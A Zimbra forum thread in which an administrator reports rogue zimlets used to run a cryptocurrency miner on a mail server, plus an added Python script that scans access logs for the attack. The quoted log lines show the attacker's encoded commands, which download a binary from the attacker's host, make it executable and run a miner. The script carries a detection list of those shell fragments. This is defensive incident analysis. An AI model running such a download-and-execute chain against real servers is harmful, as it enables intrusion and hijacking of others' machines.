
Thread: Zimbra Zimlet Exploit Resolution (Litecoin/Bitcoin mining script deployment)

  1. #1
    oneactlife, Starter Member (joined Mar 2014)

    Hi All,

    We have had a never-ending issue with Zimbra that started months ago, and after upgrading from 7.2 all the way to 8.0.6 it appears to still be happening.

    I decided to create a new thread, because the information is segmented and took forever to find. If you are looking for more information these threads led me to the problem:

    Zimbra hack
    zimbra 0-day

    The problem:

    The attacker appears to be able to deploy dummy zimlets that then can be used to write attacking code to the tmp directory and execute this. Although it appears this has only been used to start a litecoin mining process on my server, this is a SEVERE security hole! The attackers could execute bots to read through user messages, the possibilities are endless.

    Of course, we went through the upgrade process to make sure we patched any potential security holes, and double checked our users to make sure there were no other privileged users that could deploy zimlets.

    Using information from the zimbra 0-day thread, we found that "com_zimbra_example_simplejspaction" and "com_zimbra_example_simplejspaction2" were deployed to the zimlets directory. The first zimlet has been reported, but version "2" has not been mentioned in what I can find. These had older creation dates and appear to be the first zimlets that were causing the problem.

    In looking at the log output in some of the log files in the above threads, I noticed that the command uses chmod to make sure everything is executable. So I scanned the logs:

    Log Folder:
    Code:
    $ cd /opt/zimbra/log
    Command:
    Code:
    $ cat access_log* | grep chmod
    Output (Our server IP has been redacted):
    Code:
    193.0.202.101 -  -  [11/Mar/2014:04:49:27 +0000] "GET /zimlet/com_zimbra_email_dns/xd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar%2Ftmp%2Fb HTTP/1.1" 200 226 "https://SERVERIP/zimlet/com_zimbra_email_dns/xd.jsp?comment=wget+http%3A%2F%2F193.0.202.101%2FCFIDE%2Fb+-O+%2Fvar%2Ftmp%2Fb" "WWW-Mechanize/1.73" 5
    193.0.202.101 -  -  [11/Mar/2014:04:49:28 +0000] "GET /zimlet/com_zimbra_email_dns/xd.jsp?comment=%2Fvar%2Ftmp%2Fa+-B+-o+stratum%2Btcp%3A%2F%2F666.0x01-security.com%3A53+-u+ilovebigdongs.1+-p+x HTTP/1.1" 500 8427 "https://SERVERIP/zimlet/com_zimbra_email_dns/xd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar%2Ftmp%2Fb" "WWW-Mechanize/1.73" 51
    193.0.202.101 -  -  [11/Mar/2014:04:49:29 +0000] "GET /zimlet/com_zimbra_email_dns/xd.jsp?comment=%2Fvar%2Ftmp%2Fb+-B+-o+stratum%2Btcp%3A%2F%2F666.0x01-security.com%3A53+-u+ilovebigdongs.1+-p+x HTTP/1.1" 200 275 "https://SERVERIP/zimlet/com_zimbra_email_dns/xd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar%2Ftmp%2Fb" "WWW-Mechanize/1.73" 6323038
    As you can see, the most recent use of the command does not use "com_zimbra_example_simplejspaction"; it uses "com_zimbra_email_dns".

    It appears that the various zimlets were deployed prior to 8.0.6, but I am going to keep an eye on things to make sure they are clean.

    Can someone official let us know if the exploit allowing this deployment has been patched? Since we can't get any details on the exploits that are patched, it would be great for my peace of mind.

    Thanks,

    Dustin
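Added example (not from the post or from Zimbra): a Python scan over access_log lines that URL-decodes the query parameters of every /zimlet/ request and flags the shell fragments visible in the excerpt above, so that encoded forms such as %2Bx or %2Fvar%2Ftmp are caught as well as a literal grep for chmod. The log regex, the indicator list and the sample lines are constructed for this example; the first sample line follows the post's excerpt.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined-log-format line as in the access_log excerpt above (constructed
# regex; it only needs the client IP, timestamp, request target and status).
LOG_RE = re.compile(
    r'^(?P<ip>\S+)\s+\S+\s+\S+\s+\[(?P<ts>[^\]]+)\]\s+'
    r'"(?P<method>\S+)\s+(?P<target>\S+)\s+\S+"\s+(?P<status>\d{3})'
)

# Shell fragments that have no business in a zimlet query parameter; each one
# appears in the access_log excerpt in the post.
INDICATORS = ("chmod +x", "wget ", "/var/tmp/", "stratum+tcp://")

def decoded_zimlet_params(target):
    """Return {param: decoded value} for requests under /zimlet/, else {}."""
    parts = urlsplit(target)
    if not parts.path.startswith("/zimlet/"):
        return {}
    # parse_qs percent-decodes and turns '+' into spaces, so the values read
    # the way a shell would have received them.
    return {k: v[0] for k, v in parse_qs(parts.query).items()}

def scan_access_log(lines):
    """Return (ip, timestamp, zimlet path, decoded value) for suspicious hits."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        for value in decoded_zimlet_params(target).values():
            if any(ind in value for ind in INDICATORS):
                hits.append((m.group("ip"), m.group("ts"),
                             urlsplit(target).path, value))
                break
    return hits

# Constructed sample: line 1 follows the post's excerpt (same zimlet, same
# URL-encoded chmod, referrer shortened); lines 2 and 3 are benign traffic.
SAMPLE_LOG = [
    '193.0.202.101 -  -  [11/Mar/2014:04:49:27 +0000] "GET /zimlet/com_zimbra_email_dns'
    '/xd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar%2Ftmp%2Fb HTTP/1.1" 200 226 "-" "WWW-Mechanize/1.73" 5',
    '10.0.0.5 -  -  [11/Mar/2014:09:12:00 +0000] "GET /zimlet/com_zimbra_email_dns/xd.jsp?comment=hello+world HTTP/1.1" 200 226 "-" "Mozilla/5.0" 3',
    '10.0.0.6 -  -  [11/Mar/2014:09:12:01 +0000] "GET /service/soap HTTP/1.1" 200 1024 "-" "Mozilla/5.0" 9',
]

if __name__ == "__main__":
    for ip, ts, path, value in scan_access_log(SAMPLE_LOG):
        print(f"{ts} {ip} {path}: {value!r}")
```

Running it against the real files (`cat access_log* | python3 scan.py` with `sys.stdin` in place of SAMPLE_LOG) also surfaces decoded commands that a plain grep for "chmod" would miss once the attacker encodes the whole string.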

  2. #2
    phoenix, Zimbra Consultant & Moderator (Vannes, France; joined Sep 2005)

    A search of the forums would turn up all the information you need, including this: https://www.zimbra.com/forums/announ...g-84547-a.html
    Regards


    Bill

  3. #3
    oneactlife, Starter Member (joined Mar 2014)

    Thanks Bill,

    That didn't come up in my initial searches. I appreciate it.
